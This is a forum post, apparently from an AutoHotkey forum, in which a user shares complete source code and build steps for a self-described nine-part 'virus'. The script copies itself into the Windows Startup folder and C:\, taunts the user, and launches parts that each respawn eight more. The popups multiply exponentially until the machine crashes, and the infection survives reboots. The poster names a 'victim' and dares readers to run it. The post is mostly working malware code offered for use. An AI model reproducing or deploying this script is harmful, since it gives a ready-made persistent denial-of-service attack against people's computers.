I wrote a nine part script which causes huge amounts of popups to appear on the victim's computer, causing it to lag horribly followed by crashing.
by popups i mean 8 popups when you run it, 8^2 after two seconds, 8^3 after 3 seconds, 8^4 after 4 seconds, ect...
suggestions?
Also I challenge someone to put it on their computer and remove it, I will post detailed instructions in three days.
Code:
FileCopy,%A_WorkingDir%\Start.exe,C:\Documents and Settings\All Users\Start Menu\Programs\Startup,1 ; copy the ;launch code to the startup folder
FileCopy,%A_WorkingDir%\Part 1.exe,C:\,1 ; Copies Part 1 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 2.exe,C:\,1 ; Copies Part 2 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 3.exe,C:\,1 ; Copies Part 3 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 4.exe,C:\,1 ; Copies Part 4 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 5.exe,C:\,1 ; Copies Part 5 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 6.exe,C:\,1 ; Copies Part 6 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 7.exe,C:\,1 ; Copies Part 7 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 8.exe,C:\,1 ; Copies Part 8 to C:\ directory, automatically overwrites
MsgBox,262144,HAHA!!!,You're Screwed.,15 ; message box, always on top, 15 second timeout
Run, C:\Part 1.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 2.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 3.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 4.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 5.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 6.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 7.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 8.exe ; the eight parts of the virus. if one is missing, it wont work
and the eight parts all look like this:
Code:
MsgBox,262144,0,HAHA!,1
Run, C:\Part 1.exe
Run, C:\Part 2.exe
Run, C:\Part 3.exe
Run, C:\Part 4.exe
Run, C:\Part 5.exe
Run, C:\Part 6.exe
Run, C:\Part 7.exe
Run, C:\Part 8.exe
How do I post files on here?
To do the challenge, create nine AHK scripts and call them:
Start.ahk
Part 1.ahk
Part 2.ahk
Part 3.ahk
Part 4.ahk
Part 5.ahk
Part 6.ahk
Part 7.ahk
Part 8.ahk
then copy this code into the "Start" script:
Code:
FileCopy,%A_WorkingDir%\Start.exe,C:\Documents and Settings\All Users\Start Menu\Programs\Startup,1 ; copy the ;launch code to the startup folder
FileCopy,%A_WorkingDir%\Part 1.exe,C:\,1 ; Copies Part 1 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 2.exe,C:\,1 ; Copies Part 2 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 3.exe,C:\,1 ; Copies Part 3 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 4.exe,C:\,1 ; Copies Part 4 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 5.exe,C:\,1 ; Copies Part 5 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 6.exe,C:\,1 ; Copies Part 6 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 7.exe,C:\,1 ; Copies Part 7 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 8.exe,C:\,1 ; Copies Part 8 to C:\ directory, automatically overwrites
MsgBox,262144,HAHA!!!,You're Screwed.,15 ; message box, always on top, 15 second timeout
Run, C:\Part 1.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 2.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 3.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 4.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 5.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 6.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 7.exe ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 8.exe ; the eight parts of the virus. if one is missing, it wont work
And this into the eight parts:
Code:
MsgBox,262144,0,HAHA!,1
Run, C:\Part 1.exe
Run, C:\Part 2.exe
Run, C:\Part 3.exe
Run, C:\Part 4.exe
Run, C:\Part 5.exe
Run, C:\Part 6.exe
Run, C:\Part 7.exe
Run, C:\Part 8.exe
then export them all, keep them in one folder, and run Start.exe
then see if you can remove this.
instructions will be posted in 3 days.
should be easy.
-andrei901, your average wannabe AHK expert
[ Moderator!: Title changed ]